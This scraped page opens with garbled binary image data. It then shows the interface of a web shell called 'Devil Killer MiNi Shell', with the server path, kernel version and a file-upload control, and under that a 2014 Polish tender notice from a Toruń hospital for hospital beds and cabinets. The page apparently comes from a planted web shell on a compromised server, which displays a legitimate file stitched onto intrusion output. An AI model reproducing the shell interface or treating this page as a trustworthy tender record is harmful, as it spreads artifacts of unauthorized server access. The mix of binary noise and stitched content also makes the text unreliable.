JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141002/326548-N-2014.html

<p class="kh_header"><b>Toruń: Dostawa łóżek szpitalnych, szafek przyłóżkowych i tapczanów</b><br>
<b>Numer ogłoszenia: 326548 - 2014; data zamieszczenia: 02.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53-59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6101510, faks 56 6101682.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa łóżek szpitalnych, szafek przyłóżkowych i tapczanów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:

Zadanie Nr 1 - dostawa 33 szt. łóżek szpitalnych i 60szt. szafek przyłóżkowych <br>
  
1.Łóżko szpitalne  - 33szt.<br>

2.Szafka przyłóżkowa  - 55szt.<br>

3.Szafka przyłóżkowa z blatem roboczym  - 5szt.  <br>
                 
SZCZEGÓŁOWA SPECYFIKACJA TECHNICZNA -Zadanie Nr 1

I.   Łóżko szpitalne
1.Konstrukcja wykonana z kształtowników stalowych pokrytych lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne oraz promieniowanie UV
2.Szerokość całkowita 900 mm (+/- 50 mm)
3.Długość całkowita: 2100 mm (+/- 50 mm) 
4.Wysokość leża od podłogi: 600 mm (+/- 50 mm)
5.Leże łóżka 2 segmentowe
6.Segmenty leża wypełnione siatką metalową pokrytą lakierem proszkowym.
7.Ręczna regulacja oparcia pleców w zakresie 00 - 750     (+/-50)
8.Łóżko wyposażone w 4 koła o średnicy min. 125 mm z czego 2 mają posiadać blokadę jazdy i obrotu
9.Lakierowane szczyty łóżka 
10.Wyjmowane wypełnienie szczytów łóżka wykonane z płyty meblowej z możliwością wyboru koloru wypełnień
11.Łóżko zaopatrzone w krążki odbojowe zabezpieczające przed obijaniem ścian
12.Wyposażenie dodatkowe:
- Materac dopasowany do ramy leża z pianki poliuretanowej w pokrowcu paroprzepuszczalnym, nieprzenikliwy dla cieczy, z możliwością wymiany pokrowca, pokrowiec z zamkiem błyskawicznym obszyty w literę L z okapnikiem, grubość minimum 10 cm, odporny na środki dezynfekujące - 33 szt. 
-Barierki lakierowane proszkowe, wykonane z 3 profili stalowych owalnych o wysokości min. 40 mm i grubości min. 20mm składane wzdłuż ramy  leża za pomocą jednego przycisku, montowane pod ramą w specjalnych tulejach wyposażona w mechanizm zatrzaskowy z możliwością demontażu bez użycia narzędzi 
- 33 kpl.<br>

II. Szafki przyłóżkowe
1.Szkielet szafki wykonany z profili stalowych oraz blachy ocynkowanej, pokrytej lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV
2.Szerokość szafki: 380 mm (? 20 mm)
Wysokość szafki: 800 mm (? 20 mm)
Głębokość szafki: 410 mm (? 20 mm)
3.Blat szafki wykonany z płyty laminowanej, zakończony tworzywową oblamówką, odporny na wilgoć, dezynfekcję oraz promieniowanie UV. 
4.Drzwi szafki oraz front szuflady pokryte lakierem proszkowym odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV 
5.Szuflada wysuwana na prowadnicach rolkowych z wkładem tworzywowym odejmowanym. Szuflada zabezpieczona przed wysunięciem
6.Pomiędzy szufladą a kontenerem półka na prasę o wysokości min. 120 mm, dostęp do półki z czterech stron.
7.Szafka wyposażona w półkę do odkładania obuwia lub  pojemników urologicznych  wykonana z siatki stalowej (średnica min. 5 mm)  pokrytej lakierem proszkowym. Półka wyprofilowana zabezpieczająca przed wypadnięciem przedmiotów.
8.Szafka wyposażona w haczyki do zawieszania ręczników
9.Szafka z możliwością zamocowania w przyszłości blatu bocznego, bez konieczności przeróbek technologicznych.
10.Koła jezdne podwójne w tym min. 2 z blokadą, z elastycznym, niebrudzącym podłóg bieżnikiem
11.Szafka przystosowana do mycia i dezynfekcji
12.Konstrukcja szafki umożliwiająca zamiany stron montażu blatu bocznego oraz otwierania drzwiczek  (ustawienie prawo i lewostronne)
13.Kolor frontów oraz blaty z możliwością wyboru kolorów z min. 6 szt. oraz konstrukcja z możliwością wyboru z min. dwóch kolorów w tym szary.<br>

III. Szafka przyłóżkowa z blatem bocznym
1.Szkielet szafki wykonany z profili stalowych oraz blachy ocynkowanej, pokrytej lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV
2.Szerokość szafki: 380 mm (? 20 mm)
Wysokość szafki: 800 mm (? 20 mm)
Głębokość szafki: 410 mm (? 20 mm)
Szerokość wraz z blatem bocznym: 600 mm (? 20 mm)
3.Wymiary półki bocznej: 500 x 350 mm (? 20mm)
4.Blat boczny regulowany bezstopniowo w zakresie: 800 -1200 mm (? 20 mm)
5.Blat boczny z  możliwością regulacji kąta o 30stopni  lub 60stopni 
6.Blat szafki oraz blat półki bocznej wykonany z płyty laminowanej, zakończony tworzywową oblamówką, odporny na wilgoć, dezynfekcję oraz promieniowanie UV. Blat półki bocznej wyposażony w tworzywowe ranty zabezpieczające min. dwie krawędzie przed zsuwaniem się przedmiotów.  
7.Drzwi szafki oraz front szuflady pokryte lakierem proszkowym odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV 
8.Szuflada wysuwana na prowadnicach rolkowych z wkładem tworzywowymodejmowanym. Szuflada zabezpieczona przed wysunięciem
9.Pomiędzy szufladą a kontenerem półka na prasę o wysokości min. 120 mm, dostęp do półki z czterech stron.
10.Szafka wyposażona w półkę do odkładania obuwia lub  pojemników urologicznych  wykonana z siatki stalowej (średnica min. 5 mm)  pokrytej lakierem proszkowym. Półka wyprofilowana zabezpieczająca przed wypadnięciem   przedmiotów.
11.Szafka wyposażona w haczyki do zawieszania ręczników
12.Koła jezdne podwójne w tym min. 2 z blokadą, z elastycznym, niebrudzącym podłóg bieżnikiem
13.Dodatkowe piąte koło z blokadą zwiększające stabilność szafki przy rozłożonym blacie bocznym
14.Szafka przystosowana do mycia i dezynfekcji
15.Konstrukcja szafki umożliwiająca zamiany stron montażu blatu bocznego oraz otwierania drzwiczek  (ustawienie prawo i lewostronne)
16.Kolor frontów oraz blaty z możliwością wyboru kolorów z min. 6 szt. oraz konstrukcja z możliwością wyboru z min. dwóch kolorów w tym szary.<br>





Zadanie Nr 2 - dostawa 22szt.  tapczanów<br>

SZCZEGÓŁOWA SPECYFIKACJA TECHNICZNA -Zadanie Nr 2
1.Konstrukcja wykonana z naturalnego drewna sosnowego podwójnie lakierowana w kolorze orzech  
2.Szerokość całkowita 960 mm (+/- 10 mm)  
3.Długość całkowita: 2120 mm (+/- 10 mm) 
4.Podnoszony pojemnik na pościel o głębokości min. 180mm
5.Stelaż pod materac wykonany z desek o wymiarach min. 80 mm (szerokość) i min. 22 mm (grubość).    
6.Wyższy szczyt tapczanu zapewniający bezpieczeństwo osób śpiących i zapobiegający zsuwaniu się na zewnątrz poduszki podczas snu. 
Możliwość montażu wyższego szczytu tapczanu z lewej lub z prawej strony.  
7.Wyposażenie dodatkowe:
- Materac o wymiarach  900 mm (szerokość)  x 2050 mm (długość) x 160 mm (grubość) (+/- 10 mm) z pianki poliuretanowej w pokrowcu paroprzepuszczalnym, nieprzenikliwy dla cieczy, z możliwością wymiany pokrowca, pokrowiec z zamkiem błyskawicznym obszyty w literę L z okapnikiem, odporny na środki dezynfekujące - 22 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9, 33.19.21.20-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych dla Zadania Nr 1 min. 2 głównych dostaw  łóżek szpitalnych, a dla Zadania 
       Nr 2 min. 2 głównych dostaw łóżek lub tapczanów o wartości minimalnej dla poszczególnych zadań:
      - dla zadania nr 1 -   26.220,00 zł
      - dla zadania nr 2 -      8.580,00zł
       brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz załączenia min. 2 dowodów, czy zostały wykonane należycie;

Np. Wykonawca składający ofertę  na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 
2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 34.800,00zł każda dostawa.

Jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia o należytym zrealizowaniu dostawy może złożyć oświadczenie.
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego dostawy wskazane w wykazie dostaw zostały wcześniej wykonane Wykonawca nie ma obowiązku przedkładania dowodów o ich należytym wykonaniu.
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym  Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty:
      - dla zadania nr 1 -   21.850,00zł
      - dla zadania nr 2 -     7.150,00zł

         wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

	 /Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.
	Wykonawca składający ofertę na obydwa zadania musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie tych zadań.

     Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a/ aktualną deklarację zgodności potwierdzającą, że wyrób jest zgodny z wymaganiami zasadniczymi,  zgodnie z ustawą o wyrobach medycznych z dnia 20 maja (Dz. U. z 2010 r. Nr 107, poz. 679) - dotyczy Zadania Nr 1

b/ certyfikat ISO dla producenta oferowanego przedmiotu zamówienia;

c/ dokument potwierdzajacy, że pokrowiec materaca lub tkanina z której jest wykonany posiada opinię laboratoryjną potwierdzającą właściwości nieprzepuszczalności drobnoustrojów wydaną przez uprawniony do tego podmiot 

d/  dokumenty potwierdzający, że barierki łóżka spełniaja  normę bezpieczeństwa EN 60601-2-52 
 

e/	prospekty/ katalogi oferowanego przedmiotu zamówienia potwierdzające spełnianie parametrów wymaganych przez Zamawiającego.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/	oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;
b/ oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53-59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2014 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53-59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Jeżeli Wykonawcy składają ofertę wspólną ( konsorcjum, spółka cywilna) wówczas
 oświadczenia i dokumenty dotyczące braku wykluczenia z postępowania muszą złożyć wszyscy wykonawcy wchodzący w skład konsorcjum czy tworzący spółkę cywilną.
2.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów i oświadczeń będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału.
3.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. Zobowiązania podmiotu trzeciego z art. 26 ust. 2b ustawy - Prawo zamówień publicznych
należy złożyć w oryginale i podpisane przez osoby uprawnione  wynikające z zasad reprezentacji albo z pełnomocnictwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa 33 szt. łóżek szpitalnych i 60szt. szafek przyłóżkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Łóżko szpitalne  - 33szt.<br>

2.Szafka przyłóżkowa  - 55szt.<br>

3.Szafka przyłóżkowa z blatem roboczym  - 5szt.  <br>
                 
SZCZEGÓŁOWA SPECYFIKACJA TECHNICZNA -Zadanie Nr 1

I.   Łóżko szpitalne
1.Konstrukcja wykonana z kształtowników stalowych pokrytych lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne oraz promieniowanie UV
2.Szerokość całkowita 900 mm (+/- 50 mm)
3.Długość całkowita: 2100 mm (+/- 50 mm) 
4.Wysokość leża od podłogi: 600 mm (+/- 50 mm)
5.Leże łóżka 2 segmentowe
6.Segmenty leża wypełnione siatką metalową pokrytą lakierem proszkowym.
7.Ręczna regulacja oparcia pleców w zakresie 00 - 750     (+/-50)
8.Łóżko wyposażone w 4 koła o średnicy min. 125 mm z czego 2 mają posiadać blokadę jazdy i obrotu
9.Lakierowane szczyty łóżka 
10.Wyjmowane wypełnienie szczytów łóżka wykonane z płyty meblowej z możliwością wyboru koloru wypełnień
11.Łóżko zaopatrzone w krążki odbojowe zabezpieczające przed obijaniem ścian
12.Wyposażenie dodatkowe:
- Materac dopasowany do ramy leża z pianki poliuretanowej w pokrowcu paroprzepuszczalnym, nieprzenikliwy dla cieczy, z możliwością wymiany pokrowca, pokrowiec z zamkiem błyskawicznym obszyty w literę L z okapnikiem, grubość minimum 10 cm, odporny na środki dezynfekujące - 33 szt. 
-Barierki lakierowane proszkowe, wykonane z 3 profili stalowych owalnych o wysokości min. 40 mm i grubości min. 20mm składane wzdłuż ramy  leża za pomocą jednego przycisku, montowane pod ramą w specjalnych tulejach wyposażona w mechanizm zatrzaskowy z możliwością demontażu bez użycia narzędzi 
- 33 kpl.<br>

